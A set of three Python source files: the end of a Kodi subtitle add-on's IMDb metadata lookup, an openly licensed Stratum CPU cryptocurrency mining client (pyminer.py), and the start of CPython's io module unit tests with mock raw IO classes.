}
}
episodes {
...TMD_Episodes_EpisodesCardContainer
}
}
}
fragment TMD_Episodes_EpisodesCardContainer on Episodes {
result: episodes(first: 250, after: $paginationToken) {
edges {
node {
...TMD_Episodes_EpisodeCard
}
}
pageInfo {
hasNextPage
endCursor
}
}
}
fragment TMD_Episodes_EpisodeCard on Title {
id
titleText {
text
}
releaseDate {
year
}
series {
episodeNumber {
episodeNumber
seasonNumber
}
}
}
''',
'operationName': 'TitlesList',
'variables': {
'idArray': [meta.imdb_id],
'paginationToken': pagination_token
},
}),
'headers': {
'content-type': 'application/json',
},
'timeout': 10
}
response = core.request.execute(core, request)
if response.status_code != 200:
return
try:
result = json.loads(response.text)
result = result['data']['titles'][0]
if result['episodes'] is None:
meta.title = result['titleText']['text']
meta.year = str(result['releaseDate']['year'])
if result['series'] is not None:
meta.tvshow = result['series']['series']['titleText']['text']
meta.tvshow_year = str(result['series']['series']['releaseDate']['year'])
meta.season = str(result['series']['episodeNumber']['seasonNumber'])
meta.episode = str(result['series']['episodeNumber']['episodeNumber'])
else:
meta.tvshow = result['titleText']['text']
meta.tvshow_year = str(result['releaseDate']['year'])
episodes = result['episodes']['result']['edges']
s_number = int(meta.season)
ep_number = int(meta.episode)
found = False
for episode in episodes:
ep = episode['node']
series = ep['series']['episodeNumber']
if series['episodeNumber'] == ep_number and series['seasonNumber'] == s_number:
meta.title = ep['titleText']['text']
meta.year = str(ep['releaseDate']['year'])
meta.imdb_id = ep['id']
found = True
if not found and result['episodes']['result']['pageInfo']['hasNextPage']:
return __update_info_from_imdb(core, meta, result['episodes']['result']['pageInfo']['endCursor'])
except:
return
def __get_basic_info():
meta = utils.DictAsObject({})
meta.year = xbmc.getInfoLabel('VideoPlayer.Year')
meta.season = xbmc.getInfoLabel('VideoPlayer.Season')
meta.episode = xbmc.getInfoLabel('VideoPlayer.Episode')
meta.tvshow = xbmc.getInfoLabel('VideoPlayer.TVShowTitle')
meta.tvshow_year = ''
meta.title = xbmc.getInfoLabel('VideoPlayer.OriginalTitle')
if meta.title == '':
meta.title = xbmc.getInfoLabel('VideoPlayer.Title')
meta.filename = __get_filename(meta.title)
meta.filename_without_ext = meta.filename
meta.imdb_id = xbmc.getInfoLabel('VideoPlayer.IMDBNumber')
filename_and_path = xbmc.getInfoLabel('Player.FilenameAndPath')
if meta.imdb_id == '':
regex_result = re.search(r'.*(tt\d{7,}).*', filename_and_path, re.IGNORECASE)
if regex_result:
meta.imdb_id = regex_result.group(1)
if meta.season == '':
regex_result = re.search(r'.*season=(\d{1,}).*', filename_and_path, re.IGNORECASE)
if regex_result:
meta.season = regex_result.group(1)
if meta.episode == '':
regex_result = re.search(r'.*episode=(\d{1,}).*', filename_and_path, re.IGNORECASE)
if regex_result:
meta.episode = regex_result.group(1)
return meta
def get_meta(core):
meta = __get_basic_info()
if meta.imdb_id == '':
cache_key = cache.hash_data(meta)
imdb_id_cache = cache.get_imdb_id_cache()
meta.imdb_id = imdb_id_cache.get(cache_key, '')
if meta.imdb_id == '':
__scrape_imdb_id(core, meta)
if meta.imdb_id != '':
imdb_id_cache[cache_key] = meta.imdb_id
cache.save_imdb_id_cache(imdb_id_cache)
if meta.tvshow_year != '':
tvshow_years_cache = cache.get_tvshow_years_cache()
tvshow_years_cache[meta.imdb_id] = meta.tvshow_year
cache.save_tvshow_years_cache(tvshow_years_cache)
if meta.imdb_id != '':
__update_info_from_imdb(core, meta)
meta_cache = cache.get_meta_cache()
if meta.imdb_id != '' and meta_cache.imdb_id == meta.imdb_id and meta_cache.filename == meta.filename:
meta = meta_cache
else:
meta.filesize = ''
meta.filehash = ''
try:
filepath = xbmc.Player().getPlayingFile()
__set_size_and_hash(core, meta, filepath)
except:
import traceback
traceback.print_exc()
try:
meta.filename_without_ext = os.path.splitext(meta.filename)[0]
except: pass
meta_json = json.dumps(meta, indent=2)
logger.debug(meta_json)
meta = json.loads(meta_json)
meta = utils.DictAsObject(meta)
for key in meta.keys():
value = utils.strip_non_ascii_and_unprintable(meta[key])
meta[key] = str(value).strip()
cache.save_meta_cache(meta)
meta.is_tvshow = meta.tvshow != ''
meta.is_movie = not meta.is_tvshow
tvshow_year_requiring_service_enabled = (
get_bool_setting('podnadpisi', 'enabled') or
get_bool_setting('addic7ed', 'enabled')
)
if meta.is_tvshow and meta.imdb_id != '' and meta.tvshow_year == '' and tvshow_year_requiring_service_enabled:
tvshow_years_cache = cache.get_tvshow_years_cache()
tvshow_year = tvshow_years_cache.get(meta.imdb_id, '')
if tvshow_year != '':
meta.tvshow_year = tvshow_year
else:
meta.tvshow_year_thread = threading.Thread(target=__scrape_tvshow_year, args=(core, meta))
meta.tvshow_year_thread.start()
return meta
|
pyminer.py | # The MIT License (MIT)
#
# Copyright (c) 2014 Richard Moore
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import binascii, json, hashlib, socket, struct, sys, threading, time, urlparse
USER_AGENT = "PyMiner"
VERSION = [0, 1]
# Which algorithm for proof-of-work to use
ALGORITHM_SCRYPT = 'scrypt'
ALGORITHM_SHA256D = 'sha256d'
ALGORITHM_YESCRYPT = 'yescrypt'
ALGORITHMS = [ ALGORITHM_SCRYPT, ALGORITHM_SHA256D, ALGORITHM_YESCRYPT ]
# Verbosity and log level
QUIET = False
DEBUG = False
DEBUG_PROTOCOL = False
LEVEL_PROTOCOL = 'protocol'
LEVEL_INFO = 'info'
LEVEL_DEBUG = 'debug'
LEVEL_ERROR = 'error'
# These control which scrypt implementation to use
SCRYPT_LIBRARY_C = 'scrypt (https://github.com/forrestv/p2pool)'
SCRYPT_LIBRARIES = [ SCRYPT_LIBRARY_C ]
YESCRYPT_LIBRARY_C = 'https://password-hashing.net/submissions/yescrypt-v1.tar.gz'
YESCRYPT_LIBRARIES = [ YESCRYPT_LIBRARY_C ]
WELCOME_MSG = ("If you have found this software useful and would like to support its future\n"
"development, please, feel free to donate:\n\n"
" BTC: 1HKWV5t4KGUwybVHNUaaY9TXFSoBvoaSiP\n"
" ETH: 0xF17e490B391E17BE2D14BFfaA831ab8966d2e689\n"
" LTC: LNSEJzT8byYasZGd4f9c3DgtMbmexnXHdy\n"
" BCH: 1AVXvPBrNdhTdwBN5VQT5LSHa7sEzMSia4\n"
" XEM: NB3NDXRBOLEJLPT6MP6JAD4EZEOX5TFLDG3WR7JJ\n"
" MONA: MPq54r8XTwtB2qmAeVqayy27ZCaPt845B6\n"
" KOTO: k1GHJkvxLQocac94MFBbKAsdUvNbFdFWUyE\n"
" NEET: NYaP7eEsDdALK5eHPZkYk1d8pBLyGvq9L1\n\n"
"Happy mining!")
def log(message, level):
'''Conditionally write a message to stdout based on command line options and level.'''
global DEBUG
global DEBUG_PROTOCOL
global QUIET
if QUIET and level != LEVEL_ERROR: return
if not DEBUG_PROTOCOL and level == LEVEL_PROTOCOL: return
if not DEBUG and level == LEVEL_DEBUG: return
if level != LEVEL_PROTOCOL: message = '[%s] %s' % (level.upper(), message)
print ("[%s] %s" % (time.strftime("%Y-%m-%d %H:%M:%S"), message))
# Convert from/to binary and hexidecimal strings (could be replaced with .encode('hex') and .decode('hex'))
hexlify = binascii.hexlify
unhexlify = binascii.unhexlify
def sha256d(message):
'''Double SHA256 Hashing function.'''
return hashlib.sha256(hashlib.sha256(message).digest()).digest()
def swap_endian_word(hex_word):
'''Swaps the endianness of a hexidecimal string of a word and converts to a binary string.'''
message = unhexlify(hex_word)
if len(message) != 4: raise ValueError('Must be 4-byte word')
return message[::-1]
def swap_endian_words(hex_words):
'''Swaps the endianness of a hexidecimal string of words and converts to binary string.'''
message = unhexlify(hex_words)
if len(message) % 4 != 0: raise ValueError('Must be 4-byte word aligned')
return ''.join([ message[4 * i: 4 * i + 4][::-1] for i in range(0, len(message) // 4) ])
def human_readable_hashrate(hashrate):
'''Returns a human readable representation of hashrate.'''
if hashrate < 1000:
return '%2f hashes/s' % hashrate
if hashrate < 10000000:
return '%2f khashes/s' % (hashrate / 1000)
if hashrate < 10000000000:
return '%2f Mhashes/s' % (hashrate / 1000000)
return '%2f Ghashes/s' % (hashrate / 1000000000)
SCRYPT_LIBRARY = None
scrypt_proof_of_work = None
def set_scrypt_library():
'''Sets the scrypt library implementation to use.'''
global SCRYPT_LIBRARY
global scrypt_proof_of_work
import scrypt
scrypt_proof_of_work = scrypt.getPoWHash
SCRYPT_LIBRARY = SCRYPT_LIBRARY_C
set_scrypt_library()
class Job(object):
'''Encapsulates a Job from the network and necessary helper methods to mine.
"If you have a procedure with 10 parameters, you probably missed some."
~Alan Perlis
'''
def __init__(
self,
job_id,
prevhash,
coinb1,
coinb2,
merkle_branches,
version,
nbits,
ntime,
target,
extranonce1,
extranonce2_size,
proof_of_work,
max_nonce=0x7fffffff,
):
# Job parts from the mining.notify command
self._job_id = job_id
self._prevhash = prevhash
self._coinb1 = coinb1
self._coinb2 = coinb2
self._merkle_branches = [ b for b in merkle_branches ]
self._version = version
self._nbits = nbits
self._ntime = ntime
self._max_nonce = max_nonce
# Job information needed to mine from mining.subsribe
self._target = target
self._extranonce1 = extranonce1
self._extranonce2_size = extranonce2_size
# Proof of work algorithm
self._proof_of_work = proof_of_work
# Flag to stop this job's mine coroutine
self._done = False
# Hash metrics (start time, delta time, total hashes)
self._dt = 0.0
self._hash_count = 0
# Accessors
id = property(lambda s: s._job_id)
prevhash = property(lambda s: s._prevhash)
coinb1 = property(lambda s: s._coinb1)
coinb2 = property(lambda s: s._coinb2)
merkle_branches = property(lambda s: [ b for b in s._merkle_branches ])
version = property(lambda s: s._version)
nbits = property(lambda s: s._nbits)
ntime = property(lambda s: s._ntime)
target = property(lambda s: s._target)
extranonce1 = property(lambda s: s._extranonce1)
extranonce2_size = property(lambda s: s._extranonce2_size)
proof_of_work = property(lambda s: s._proof_of_work)
@property
def hashrate(self):
'''The current hashrate, or if stopped hashrate for the job's lifetime.'''
if self._dt == 0: return 0.0
return self._hash_count / self._dt
def merkle_root_bin(self, extranonce2_bin):
'''Builds a merkle root from the merkle tree'''
coinbase_bin = unhexlify(self._coinb1) + unhexlify(self._extranonce1) + extranonce2_bin + unhexlify(self._coinb2)
coinbase_hash_bin = sha256d(coinbase_bin)
merkle_root = coinbase_hash_bin
for branch in self._merkle_branches:
merkle_root = sha256d(merkle_root + unhexlify(branch))
return merkle_root
def stop(self):
'''Requests the mine coroutine stop after its current iteration.'''
self._done = True
def mine(self, nonce_start=0, nonce_stride=1):
'''Returns an iterator that iterates over valid proof-of-work shares.
This is a co-routine; that takes a LONG time; the calling thread should look like:
for result in job.mine(self):
submit_work(result)
nonce_start and nonce_stride are useful for multi-processing if you would like
to assign each process a different starting nonce (0, 1, 2, ...) and a stride
equal to the number of processes.
'''
t0 = time.time()
# @TODO: test for extranonce != 0... Do I reverse it or not?
for extranonce2 in xrange(self._max_nonce):
# Must be unique for any given job id, according to http://mining.bitcoin.cz/stratum-mining/ but never seems enforced?
extranonce2_bin = struct.pack('<I', extranonce2)
merkle_root_bin = self.merkle_root_bin(extranonce2_bin)
header_prefix_bin = swap_endian_word(self._version) + swap_endian_words(self._prevhash) + merkle_root_bin + swap_endian_word(self._ntime) + swap_endian_word(self._nbits)
for nonce in xrange(nonce_start, self._max_nonce, nonce_stride):
# This job has been asked to stop
if self._done:
self._dt += (time.time() - t0)
raise StopIteration()
# Proof-of-work attempt
nonce_bin = struct.pack('<I', nonce)
pow = self.proof_of_work(header_prefix_bin + nonce_bin)[::-1].encode('hex')
# Did we reach or exceed our target?
if pow <= self.target:
result = dict(
job_id = self.id,
extranonce2 = hexlify(extranonce2_bin),
ntime = str(self._ntime), # Convert to str from json unicode
nonce = hexlify(nonce_bin[::-1])
)
self._dt += (time.time() - t0)
yield result
t0 = time.time()
self._hash_count += 1
def __str__(self):
return '<Job id=%s prevhash=%s coinb1=%s coinb2=%s merkle_branches=%s version=%s nbits=%s ntime=%s target=%s extranonce1=%s extranonce2_size=%d>' % (self.id, self.prevhash, self.coinb1, self.coinb2, self.merkle_branches, self.version, self.nbits, self.ntime, self.target, self.extranonce1, self.extranonce2_size)
# Subscription state
class Subscription(object):
'''Encapsulates the Subscription state from the JSON-RPC server'''
_max_nonce = None
# Subclasses should override this
def ProofOfWork(header):
raise Exception('Do not use the Subscription class directly, subclass it')
class StateException(Exception): pass
def __init__(self):
self._id = None
self._difficulty = None
self._extranonce1 = None
self._extranonce2_size = None
self._target = None
self._worker_name = None
self._mining_thread = None
# Accessors
id = property(lambda s: s._id)
worker_name = property(lambda s: s._worker_name)
difficulty = property(lambda s: s._difficulty)
target = property(lambda s: s._target)
extranonce1 = property(lambda s: s._extranonce1)
extranonce2_size = property(lambda s: s._extranonce2_size)
def set_worker_name(self, worker_name):
if self._worker_name:
raise self.StateException('Already authenticated as %r (requesting %r)' % (self._username, username))
self._worker_name = worker_name
def _set_target(self, target):
self._target = '%064x' % target
def set_difficulty(self, difficulty):
if difficulty < 0: raise self.StateException('Difficulty must be non-negative')
# Compute target
if difficulty == 0:
target = 2 ** 256 - 1
else:
target = min(int((0xffff0000 * 2 ** (256 - 64) + 1) / difficulty - 1 + 0.5), 2 ** 256 - 1)
self._difficulty = difficulty
self._set_target(target)
def set_subscription(self, subscription_id, extranonce1, extranonce2_size):
if self._id is not None:
raise self.StateException('Already subscribed')
self._id = subscription_id
self._extranonce1 = extranonce1
self._extranonce2_size = extranonce2_size
def create_job(self, job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime):
'''Creates a new Job object populated with all the goodness it needs to mine.'''
if self._id is None:
raise self.StateException('Not subscribed')
return Job(
job_id=job_id,
prevhash=prevhash,
coinb1=coinb1,
coinb2=coinb2,
merkle_branches=merkle_branches,
version=version,
nbits=nbits,
ntime=ntime,
target=self.target,
extranonce1=self._extranonce1,
extranonce2_size=self.extranonce2_size,
proof_of_work=self.ProofOfWork,
max_nonce=self._max_nonce,
)
def __str__(self):
return '<Subscription id=%s, extranonce1=%s, extranonce2_size=%d, difficulty=%d worker_name=%s>' % (self.id, self.extranonce1, self.extranonce2_size, self.difficulty, self.worker_name)
class SubscriptionScrypt(Subscription):
'''Subscription for Scrypt-based coins, like Litecoin.'''
ProofOfWork = lambda s, h: scrypt_proof_of_work(h)
_max_nonce = 0x7fffffff
def _set_target(self, target):
# Why multiply by 2**16? See: https://litecoin.info/Mining_pool_comparison
self._target = '%064x' % (target << 16)
class SubscriptionSHA256D(Subscription):
'''Subscription for Double-SHA256-based coins, like Bitcoin.'''
ProofOfWork = sha256d
class SubscriptionYescrypt(Subscription):
'''Subscription for Yescrypt-based coins.'''
import yescrypt
ProofOfWork = yescrypt.getPoWHash
_max_nonce = 0x3fffff
def _set_target(self, target):
self._target = '%064x' % (target << 16)
# Maps algorithms to their respective subscription objects
SubscriptionByAlgorithm = {
ALGORITHM_SCRYPT: SubscriptionScrypt,
ALGORITHM_SHA256D: SubscriptionSHA256D,
ALGORITHM_YESCRYPT: SubscriptionYescrypt,
}
class SimpleJsonRpcClient(object):
'''Simple JSON-RPC client.
To use this class:
1) Create a sub-class
2) Override handle_reply(self, request, reply)
3) Call connect(socket)
Use self.send(method, params) to send JSON-RPC commands to the server.
A new thread is created for listening to the connection; so calls to handle_reply
are synchronized. It is safe to call send from withing handle_reply.
'''
class ClientException(Exception): pass
class RequestReplyException(Exception):
def __init__(self, message, reply, request = None):
Exception.__init__(self, message)
self._reply = reply
self._request = request
request = property(lambda s: s._request)
reply = property(lambda s: s._reply)
class RequestReplyWarning(RequestReplyException):
'''Sub-classes can raise this to inform the user of JSON-RPC server issues.'''
pass
def __init__(self):
self._socket = None
self._lock = threading.RLock()
self._rpc_thread = None
self._message_id = 1
self._requests = dict()
def _handle_incoming_rpc(self):
data = ""
while True:
# Get the next line if we have one, otherwise, read and block
if '\n' in data:
(line, data) = data.split('\n', 1)
else:
chunk = self._socket.recv(1024)
data += chunk
continue
log('JSON-RPC Server > ' + line, LEVEL_PROTOCOL)
# Parse the JSON
try:
reply = json.loads(line)
except Exception, e:
log("JSON-RPC Error: Failed to parse JSON %r (skipping)" % line, LEVEL_ERROR)
continue
try:
request = None
with self._lock:
if 'id' in reply and reply['id'] in self._requests:
request = self._requests[reply['id']]
self.handle_reply(request = request, reply = reply)
except self.RequestReplyWarning, e:
output = e.message
if e.request:
try:
output += '\n ' + e.request
except TypeError:
output += '\n ' + str(e.request)
output += '\n ' + e.reply
log(output, LEVEL_ERROR)
def handle_reply(self, request, reply):
# Override this method in sub-classes to handle a message from the server
raise self.RequestReplyWarning('Override this method')
def send(self, method, params):
'''Sends a message to the JSON-RPC server'''
if not self._socket:
raise self.ClientException('Not connected')
request = dict(id = self._message_id, method = method, params = params)
message = json.dumps(request)
with self._lock:
self._requests[self._message_id] = request
self._message_id += 1
self._socket.send(message + '\n')
log('JSON-RPC Server < ' + message, LEVEL_PROTOCOL)
return request
def connect(self, socket):
'''Connects to a remove JSON-RPC server'''
if self._rpc_thread:
raise self.ClientException('Already connected')
self._socket = socket
self._rpc_thread = threading.Thread(target = self._handle_incoming_rpc)
self._rpc_thread.daemon = True
self._rpc_thread.start()
# Miner client
class Miner(SimpleJsonRpcClient):
'''Simple mining client'''
class MinerWarning(SimpleJsonRpcClient.RequestReplyWarning):
def __init__(self, message, reply, request = None):
SimpleJsonRpcClient.RequestReplyWarning.__init__(self, 'Mining Sate Error: ' + message, reply, request)
class MinerAuthenticationException(SimpleJsonRpcClient.RequestReplyException): pass
def __init__(self, url, username, password, algorithm=ALGORITHM_YESCRYPT):
SimpleJsonRpcClient.__init__(self)
self._url = url
self._username = username
self._password = password
self._subscription = SubscriptionByAlgorithm[algorithm]()
self._job = None
self._accepted_shares = 0
# Accessors
url = property(lambda s: s._url)
username = property(lambda s: s._username)
password = property(lambda s: s._password)
# Overridden from SimpleJsonRpcClient
def handle_reply(self, request, reply):
# New work, stop what we were doing before, and start on this.
if reply.get('method') == 'mining.notify':
if 'params' not in reply or len(reply['params']) != 9:
raise self.MinerWarning('Malformed mining.notify message', reply)
(job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime, clean_jobs) = reply['params']
self._spawn_job_thread(job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime)
log('New job: job_id=%s' % job_id, LEVEL_DEBUG)
# The server wants us to change our difficulty (on all *future* work)
elif reply.get('method') == 'mining.set_difficulty':
if 'params' not in reply or len(reply['params']) != 1:
raise self.MinerWarning('Malformed mining.set_difficulty message', reply)
(difficulty, ) = reply['params']
self._subscription.set_difficulty(difficulty)
log('Change difficulty: difficulty=%s' % difficulty, LEVEL_DEBUG)
# This is a reply to...
elif request:
# ...subscribe; set-up the work and request authorization
if request.get('method') == 'mining.subscribe':
if 'result' not in reply or len(reply['result']) != 3 or len(reply['result'][0]) != 2:
raise self.MinerWarning('Reply to mining.subscribe is malformed', reply, request)
((mining_notify, subscription_id), extranonce1, extranonce2_size) = reply['result']
self._subscription.set_subscription(subscription_id, extranonce1, extranonce2_size)
log('Subscribed: subscription_id=%s' % subscription_id, LEVEL_DEBUG)
# Request authentication
self.send(method = 'mining.authorize', params = [ self.username, self.password ])
# ...authorize; if we failed to authorize, quit
elif request.get('method') == 'mining.authorize':
if 'result' not in reply or not reply['result']:
raise self.MinerAuthenticationException('Failed to authenticate worker', reply, request)
worker_name = request['params'][0]
self._subscription.set_worker_name(worker_name)
log('Authorized: worker_name=%s' % worker_name, LEVEL_DEBUG)
# ...submit; complain if the server didn't accept our submission
elif request.get('method') == 'mining.submit':
if 'result' not in reply or not reply['result']:
log('Share - Invalid', LEVEL_INFO)
raise self.MinerWarning('Failed to accept submit', reply, request)
self._accepted_shares += 1
log('Accepted shares: %d' % self._accepted_shares, LEVEL_INFO)
# ??? *shrug*
else:
raise self.MinerWarning('Unhandled message', reply, request)
# ??? *double shrug*
else:
raise self.MinerWarning('Bad message state', reply)
def _spawn_job_thread(self, job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime):
'''Stops any previous job and begins a new job.'''
# Stop the old job (if any)
if self._job: self._job.stop()
# Create the new job
self._job = self._subscription.create_job(
job_id = job_id,
prevhash = prevhash,
coinb1 = coinb1,
coinb2 = coinb2,
merkle_branches = merkle_branches,
version = version,
nbits = nbits,
ntime = ntime
)
def run(job):
try:
for result in job.mine():
params = [ self._subscription.worker_name ] + [ result[k] for k in ('job_id', 'extranonce2', 'ntime', 'nonce') ]
self.send(method = 'mining.submit', params = params)
log("Found share: " + str(params), LEVEL_INFO)
log("Hashrate: %s" % human_readable_hashrate(job.hashrate), LEVEL_INFO)
except Exception, e:
log("ERROR: %s" % e, LEVEL_ERROR)
thread = threading.Thread(target = run, args = (self._job, ))
thread.daemon = True
thread.start()
@staticmethod
def welcome_msg():
log(WELCOME_MSG, LEVEL_INFO)
def serve_forever(self):
'''Begins the miner. This method does not return.'''
# Figure out the hostname and port
url = urlparse.urlparse(self.url)
hostname = url.hostname or ''
port = url.port or 9333
self.welcome_msg()
log('Starting server on %s:%d' % (hostname, port), LEVEL_INFO)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))
self.connect(sock)
self.send(method = 'mining.subscribe', params = [ "%s/%s" % (USER_AGENT, '.'.join(str(p) for p in VERSION)) ])
# Forever...
while True:
time.sleep(10)
def test_subscription():
'''Test harness for mining, using a known valid share.'''
log('TEST: Scrypt algorithm = %r' % SCRYPT_LIBRARY, LEVEL_DEBUG)
log('TEST: Testing Subscription', LEVEL_DEBUG)
subscription = SubscriptionScrypt()
# Set up the subscription
reply = json.loads('{"error": null, "id": 1, "result": [["mining.notify", "ae6812eb4cd7735a302a8a9dd95cf71f"], "f800880e", 4]}')
log('TEST: %r' % reply, LEVEL_DEBUG)
((mining_notify, subscription_id), extranonce1, extranonce2_size) = reply['result']
subscription.set_subscription(subscription_id, extranonce1, extranonce2_size)
# Set the difficulty
reply = json.loads('{"params": [32], "id": null, "method": "mining.set_difficulty"}')
log('TEST: %r' % reply, LEVEL_DEBUG)
(difficulty, ) = reply['params']
subscription.set_difficulty(difficulty)
# Create a job
reply = json.loads('{"params": ["1db7", "0b29bfff96c5dc08ee65e63d7b7bab431745b089ff0cf95b49a1631e1d2f9f31", "01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2503777d07062f503253482f0405b8c75208", "0b2f436f696e48756e74722f0000000001603f352a010000001976a914c633315d376c20a973a758f7422d67f7bfed9c5888ac00000000", ["f0dbca1ee1a9f6388d07d97c1ab0de0e41acdf2edac4b95780ba0a1ec14103b3", "8e43fd2988ac40c5d97702b7e5ccdf5b06d58f0e0d323f74dd5082232c1aedf7", "1177601320ac928b8c145d771dae78a3901a089fa4aca8def01cbff747355818", "9f64f3b0d9edddb14be6f71c3ac2e80455916e207ffc003316c6a515452aa7b4", "2d0b54af60fad4ae59ec02031f661d026f2bb95e2eeb1e6657a35036c017c595"], "00000002", "1b148272", "52c7b81a", true], "id": null, "method": "mining.notify"}')
log('TEST: %r' % reply, LEVEL_DEBUG)
(job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime, clean_jobs) = reply['params']
job = subscription.create_job(
job_id = job_id,
prevhash = prevhash,
coinb1 = coinb1,
coinb2 = coinb2,
merkle_branches = merkle_branches,
version = version,
nbits = nbits,
ntime = ntime
)
# Scan that job (if I broke something, this will run for a long time))
for result in job.mine(nonce_start = 1210450368 - 3):
log('TEST: found share - %r' % repr(result), LEVEL_DEBUG)
break
valid = { 'ntime': '52c7b81a', 'nonce': '482601c0', 'extranonce2': '00000000', 'job_id': u'1db7' }
log('TEST: Correct answer %r' % valid, LEVEL_DEBUG)
# CLI for cpu mining
if __name__ == '__main__':
import argparse
# Parse the command line
parser = argparse.ArgumentParser(description="PyMiner is a Stratum CPU mining client. "
"If you like this piece of software, please "
"consider supporting its future development via "
"donating to one of the addresses indicated in the "
"README.md file")
parser.add_argument('-o', '--url', help = 'stratum mining server url (eg: stratum+tcp://foobar.com:3333)')
parser.add_argument('-u', '--user', dest = 'username', default = '', help = 'username for mining server', metavar = "USERNAME")
parser.add_argument('-p', '--pass', dest = 'password', default = '', help = 'password for mining server', metavar = "PASSWORD")
parser.add_argument('-O', '--userpass', help = 'username:password pair for mining server', metavar = "USERNAME:PASSWORD")
parser.add_argument('-a', '--algo', default = ALGORITHM_SCRYPT, choices = ALGORITHMS, help = 'hashing algorithm to use for proof of work')
parser.add_argument('-B', '--background', action ='store_true', help = 'run in the background as a daemon')
parser.add_argument('-q', '--quiet', action ='store_true', help = 'suppress non-errors')
parser.add_argument('-P', '--dump-protocol', dest = 'protocol', action ='store_true', help = 'show all JSON-RPC chatter')
parser.add_argument('-d', '--debug', action ='store_true', help = 'show extra debug information')
parser.add_argument('-v', '--version', action = 'version', version = '%s/%s' % (USER_AGENT, '.'.join(str(v) for v in VERSION)))
options = parser.parse_args(sys.argv[1:])
message = None
# Get the username/password
username = options.username
password = options.password
if options.userpass:
if username or password:
message = 'May not use -O/-userpass in conjunction with -u/--user or -p/--pass'
else:
try:
(username, password) = options.userpass.split(':')
except Exception, e:
message = 'Could not parse username:password for -O/--userpass'
# Was there an issue? Show the help screen and exit.
if message:
parser.print_help()
print
print message
sys.exit(1)
# Set the logging level
if options.debug:DEBUG = True
if options.protocol: DEBUG_PROTOCOL = True
if options.quiet: QUIET = True
if DEBUG:
for library in SCRYPT_LIBRARIES:
set_scrypt_library()
test_subscription()
# Set us to a faster library if available
set_scrypt_library()
if options.algo == ALGORITHM_SCRYPT:
log('Using scrypt library %r' % SCRYPT_LIBRARY, LEVEL_DEBUG)
# The want a daemon, give them a daemon
if options.background:
import os
if os.fork() or os.fork(): sys.exit()
# Heigh-ho, heigh-ho, it's off to work we go...
if options.url:
miner = Miner(options.url, username, password, algorithm = options.algo)
miner.serve_forever()
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import time
import array
import random
import unittest
import weakref
import warnings
import abc
import signal
import errno
from itertools import cycle, count
from collections import deque
from UserList import UserList
from test import test_support as support
import contextlib
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import fcntl
except ImportError:
fcntl = None
__metaclass__ = type
bytes = support.py3k_bytes
def byteslike(*pos, **kw):
return memoryview(bytearray(*pos, **kw))
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with io.open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return MockRawIO.write(self, b) * 2
def read(self, n=None):
return MockRawIO.read(self, n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
MockRawIO.readinto(self, buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
